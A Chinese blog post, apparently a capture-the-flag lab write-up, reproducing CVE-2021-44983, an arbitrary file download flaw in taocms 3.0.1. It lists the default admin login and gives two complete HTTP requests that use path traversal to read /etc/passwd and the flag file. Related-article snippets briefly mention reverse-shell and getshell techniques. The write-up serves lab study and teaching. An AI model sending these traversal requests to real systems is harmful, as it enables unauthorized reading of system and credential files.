云镜CVE-2021-44983复现

最新推荐文章于 2024-05-25 15:23:03 发布
最新推荐文章于 2024-05-25 15:23:03 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: 日常练习 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/129214411
版权

CVE-2021-44983复现


🍉 === shell
来源:https://yunjing.ichunqiu.com/cve/detail/967?type=1&pay=2

漏洞信息

漏洞名称taocms 3.0.1 登陆后台后文件管理处存在任意文件下载漏洞
漏洞编号CVE-2021-44983
危害等级中危
漏洞类型任意文件下载
漏洞厂商-
漏洞组件-
受影响版本taocms 3.0.1

漏洞概述 : Taocms是中国的一个微型 Cms(内容管理系统)。
taocms 存在安全漏洞,该漏洞源于 taocms 3.0.1 版本登录后台后,文件管理栏有任意文件下载漏洞。

漏洞复现

右下导航管理,来到管理登录页面,默认账号密码为admin和tao
来到文件管理,随意下载一个文件,同时bp抓包,这里下载/etc/passwd文件
修改成:

GET /admin/admin.php?action=file&ctrl=download&path=…/…/…/…/…/…/…/…/etc/passwd HTTP/1.1
Host: eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=3or4ue21gj4fdmsviqiatmh42q
Upgrade-Insecure-Requests: 1

然后放包,发现下载了passwd.htm文件打开看就是/etc/passwd文件的内容
请添加图片描述

读取flag

很简单,重新来一遍,这里下载根目录下的flag

GET /admin/admin.php?action=file&ctrl=download&path=…/…/…/…/…/…/flag HTTP/1.1
Host: eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://eci-2zegdpiqks0rx2i7rv1s.cloudeci1.ichunqiu.com/admin/admin.php?action=file&ctrl=lists
Cookie: PHPSESSID=3or4ue21gj4fdmsviqiatmh42q
Upgrade-Insecure-Requests: 1

获取flag.htm文件,查看:
请添加图片描述

伽蓝之堂
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
任意文件下载漏洞(CVE-2021-44983
热门推荐
Battery的博客
11-22 5万+
CVE-2021-44983是Taocms内容管理系统中的一个安全漏洞,可以追溯到版本3.0.1。该漏洞主要源于在登录后台后,文件管理栏存在任意文件下载漏洞。简言之,这个漏洞可能让攻击者通过特定的请求下载系统中的任意文件,包括但不限于敏感信息、配置文件等,从而可能导致系统被攻击或者数据泄露。
[春秋云镜]CVE-2021-44983
niubi707的博客
11-28 512
[春秋云镜]CVE-2021-44983复现
春秋云镜 CVE-2021-44983
qq_22002773的博客
07-27 178
春秋云镜 CVE-2021-44983
【春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
果粒程
12-14 522
【春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
taoCMS后台getshell漏洞复现
m0_52400001的博客
05-23 1039
简介 taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小的功能完善的基于php+SQLite/Mysql的CMS 漏洞版本 taocms 3.0.2 开始复现 1.由于本地搭建的系统,我们直接输入amdn/taoj进入管理后台 2.进入管理后台以后我们去看左边的功能栏目,找到文件管理并点开,并发现.htaccess文件 3我们点击编辑这个文件,在文件的最后面添加'AddType application/x-httpd-php .php
春秋云镜 CVE-2021-24762
qq_22002773的博客
08-03 432
春秋云镜 CVE-2021-24762
春秋云镜 CVE-2021-40282
qq_22002773的博客
07-29 234
CVE-2021-40282
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1174
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
【全开源】沃德商协会管理系统源码(FastAdmin+ThinkPHP+Uniapp)
最新发布
u011092458的博客
05-25 416
一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒,有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场,真正做到为构建有影响力的现代化智慧型组织赋能。数据决策支持:沃德商协会管理系统源码提供的数据统计和分析功能,为商协会提供了宝贵的决策支持,帮助商协会更好地了解市场需求和会员需求,制定更精准的发展战略。
深入解析:Element Plus 与 Vite、Nuxt、Laravel 的结合使用
一个普通人
05-23 957
Element Plus 作为一个强大的 Vue.js 组件库,可以与 Vite、Nuxt 和 Laravel 等不同的工具和框架结合使用,为开发者提供灵活、高效的开发体验。根据项目需求选择合适的工具和框架,可以极大地提升开发效率和应用性能
PHP生成二维码+二维码包含logo图片展示
颜夕_
05-20 281
前端你自己列表读uploads/admin/qrcode/‘.$aid.’.png这个就行。生成二维码包含logo图片(代码仅供参考,逻辑按照自己的写)用到的扩展自己安装(注:只生成二维码只要开gd扩展就行)
PHP封装一个强大且通用的CURL方法
A-南的博客
05-23 216
PHP封装一个通用的CURL方法 支持:get、post、put、delete、patch、options。
Vitis HLS 学习笔记--控制驱动TLP-处理deadlock
hi94的博客
05-22 975
在数据流优化中,通道类型、握手机制、FIFO大小和死锁避免都是关键因素。通过Dataflow查看器和协同仿真数据,您可以有效地优化设计,提高性能并避免潜在问题。
CVE-2021-28041复现
03-13
由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值